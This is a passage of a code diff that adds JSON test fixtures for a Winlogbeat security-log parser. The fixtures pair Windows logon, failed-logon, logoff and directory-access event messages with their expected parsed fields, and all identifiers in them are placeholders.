+        "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+        "name": "Windows Server 2019 Datacenter",
+        "platform": "windows",
+        "version": "10.0"
+      }
+    },
+    "log": {
+      "level": "information"
+    },
+    "related": {
+      "hosts": [
+        "hostname"
+      ]
+    },
+    "sekoiaio": {
+      "authentication": {
+        "process": {
+          "name": "Process "
+        }
+      },
+      "client": {
+        "name": "WS-USER-01",
+        "os": {
+          "type": "windows"
+        }
+      },
+      "server": {
+        "name": "hostname",
+        "os": {
+          "type": "windows"
+        }
+      }
+    },
+    "user": {
+      "id": "S-1-2-3",
+      "name": "WS-USER-01$",
+      "target": {
+        "domain": "DOMAIN",
+        "id": "S-4-5-6",
+        "name": "target_user"
+      }
+    },
+    "winlog": {
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "hostname.company.com",
+      "event_id": "4624",
+      "keywords": [
+        "Audit Success"
+      ],
+      "logon": {
+        "id": "0x3e7",
+        "type": "Network"
+      },
+      "opcode": "Info",
+      "process": {
+        "pid": 752,
+        "thread": {
+          "id": 7960
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "1170100815",
+      "task": "Logon",
+      "version": 2
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json
new file mode 100644
index 000000000..ac5882d46
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4625.json
@@ -0,0 +1,193 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}"
+  },
+  "expected": {
+    "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}",
+    "event": {
+      "action": "authentication_network",
+      "category": [
+        "authentication"
+      ],
+      "code": "4625",
+      "kind": "event",
+      "module": "security",
+      "outcome": "failure",
+      "provider": "Microsoft-Windows-Security-Auditing",
+      "reason": "user_not_exist",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2024-11-12T08:40:34.260000Z",
+    "action": {
+      "id": 4625,
+      "outcome": "failure",
+      "properties": {
+        "AuthenticationPackageName": "Kerberos",
+        "FailureReason": "%%2313",
+        "IpAddress": "-",
+        "IpPort": "-",
+        "KeyLength": "0",
+        "LmPackageName": "-",
+        "LogonProcessName": "Channel",
+        "LogonType": "3",
+        "ProcessId": "0x338",
+        "ProcessName": "C:\\Windows\\System32\\executable.exe",
+        "Status": "0xc000006d",
+        "SubStatus": "0xc0000064",
+        "SubjectDomainName": "J_DOE",
+        "SubjectLogonId": "0x3e7",
+        "SubjectUserName": "WORKSTATION$",
+        "SubjectUserSid": "S-1-2-3",
+        "TargetUserSid": "S-1-0-0",
+        "TransmittedServices": "-",
+        "WorkstationName": "WORKSTATION"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+      "id": "12345678-abcd-ef90-1234-abcdef123456",
+      "name": "WORKSTATION",
+      "type": "filebeat",
+      "version": "8.14.1"
+    },
+    "host": {
+      "architecture": "x86_64",
+      "hostname": "hostname",
+      "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+      "ip": [
+        "1.2.3.4",
+        "4.3.2.1",
+        "5.6.7.8",
+        "fe80::1111:2222:3333:4444",
+        "fe80::1234:5678:90ab:cde",
+        "fe80::1234:abcd:ef",
+        "fe80::a0b1:c2d:3e4",
+        "fe80::aaaa:bbbb:cccc:dddd",
+        "fe80::abcd:1234:567"
+      ],
+      "mac": [
+        "00-00-00-00-00-00-00-00",
+        "11-11-11-11-11-11",
+        "A0-B1-C2-D3-E4-F5",
+        "AA-BB-CC-DD-EE-FF"
+      ],
+      "name": "hostname",
+      "os": {
+        "build": "14393.7428",
+        "family": "windows",
+        "kernel": "10.0.14393.7426 (rs1_release.240926-1524)",
+        "name": "Windows Server 2016 Datacenter",
+        "platform": "windows",
+        "type": "windows",
+        "version": "10.0"
+      }
+    },
+    "log": {
+      "level": "information"
+    },
+    "process": {
+      "executable": "C:\\Windows\\System32\\executable.exe",
+      "name": "executable.exe",
+      "pid": 824
+    },
+    "related": {
+      "hosts": [
+        "WORKSTATION",
+        "hostname"
+      ],
+      "ip": [
+        "1.2.3.4",
+        "4.3.2.1",
+        "5.6.7.8",
+        "fe80::1111:2222:3333:4444",
+        "fe80::1234:5678:90ab:cde",
+        "fe80::1234:abcd:ef",
+        "fe80::a0b1:c2d:3e4",
+        "fe80::aaaa:bbbb:cccc:dddd",
+        "fe80::abcd:1234:567"
+      ]
+    },
+    "sekoiaio": {
+      "authentication": {
+        "process": {
+          "name": "Channel"
+        }
+      },
+      "client": {
+        "name": "WORKSTATION",
+        "os": {
+          "type": "windows"
+        }
+      },
+      "server": {
+        "name": "hostname",
+        "os": {
+          "type": "windows"
+        }
+      }
+    },
+    "server": {
+      "ip": [
+        "1.2.3.4",
+        "4.3.2.1",
+        "5.6.7.8",
+        "fe80::1111:2222:3333:4444",
+        "fe80::1234:5678:90ab:cde",
+        "fe80::1234:abcd:ef",
+        "fe80::a0b1:c2d:3e4",
+        "fe80::aaaa:bbbb:cccc:dddd",
+        "fe80::abcd:1234:567"
+      ]
+    },
+    "source": {
+      "address": "WORKSTATION",
+      "domain": "WORKSTATION",
+      "port": 0
+    },
+    "user": {
+      "id": "S-1-2-3",
+      "name": "WORKSTATION$",
+      "target": {
+        "id": "S-1-0-0"
+      }
+    },
+    "winlog": {
+      "activity_id": "{12345678-abcd-efab-cdef-123456789012}",
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "WORKSTATION.johndoe.com",
+      "event_id": "4625",
+      "keywords": [
+        "Audit Failure"
+      ],
+      "logon": {
+        "failure": {
+          "reason": "Unknown user name or bad password.",
+          "status": "This is either due to a bad username or authentication information",
+          "sub_status": "User logon with misspelled or bad user account"
+        },
+        "id": "0x3e7",
+        "type": "Network"
+      },
+      "opcode": "Info",
+      "process": {
+        "pid": 824,
+        "thread": {
+          "id": 28936
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "2552812283",
+      "task": "Logon"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json
new file mode 100644
index 000000000..ddc69e63b
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4634.json
@@ -0,0 +1,112 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}"
+  },
+  "expected": {
+    "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}",
+    "event": {
+      "action": "Logoff",
+      "code": "4634",
+      "kind": "event",
+      "module": "security",
+      "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing"
+    },
+    "@timestamp": "2024-11-12T08:42:47.895000Z",
+    "action": {
+      "id": 4634,
+      "outcome": "success",
+      "properties": {
+        "LogonType": "3",
+        "TargetDomainName": "J_DOE",
+        "TargetLogonId": "0x5ed35bb6",
+        "TargetUserName": "ACCOUNT",
+        "TargetUserSid": "S-1-2-3"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+      "id": "12345678-abcd-ef90-1234-abcdef123456",
+      "name": "PC01",
+      "type": "filebeat",
+      "version": "8.14.1"
+    },
+    "host": {
+      "architecture": "x86_64",
+      "hostname": "pc01",
+      "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ],
+      "mac": [
+        "00-11-22-33-44-55"
+      ],
+      "name": "pc01",
+      "os": {
+        "build": "17763.6414",
+        "family": "windows",
+        "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+        "name": "Windows Server 2019 Standard",
+        "platform": "windows",
+        "type": "windows",
+        "version": "10.0"
+      }
+    },
+    "log": {
+      "level": "information"
+    },
+    "related": {
+      "hosts": [
+        "pc01"
+      ],
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ],
+      "user": [
+        "ACCOUNT"
+      ]
+    },
+    "user": {
+      "domain": "J_DOE",
+      "id": "S-1-2-3",
+      "name": "ACCOUNT",
+      "target": {
+        "domain": "J_DOE",
+        "name": "ACCOUNT"
+      }
+    },
+    "winlog": {
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "PC01.jdoe.com",
+      "event_id": "4634",
+      "keywords": [
+        "Audit Success"
+      ],
+      "logon": {
+        "id": "0x5ed35bb6",
+        "type": "Network"
+      },
+      "opcode": "Info",
+      "process": {
+        "pid": 704,
+        "thread": {
+          "id": 6336
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "15983780774",
+      "task": "Logoff"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json
new file mode 100644
index 000000000..3d80320f5
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4662.json
@@ -0,0 +1,105 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}"
+  },
+  "expected": {
+    "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler 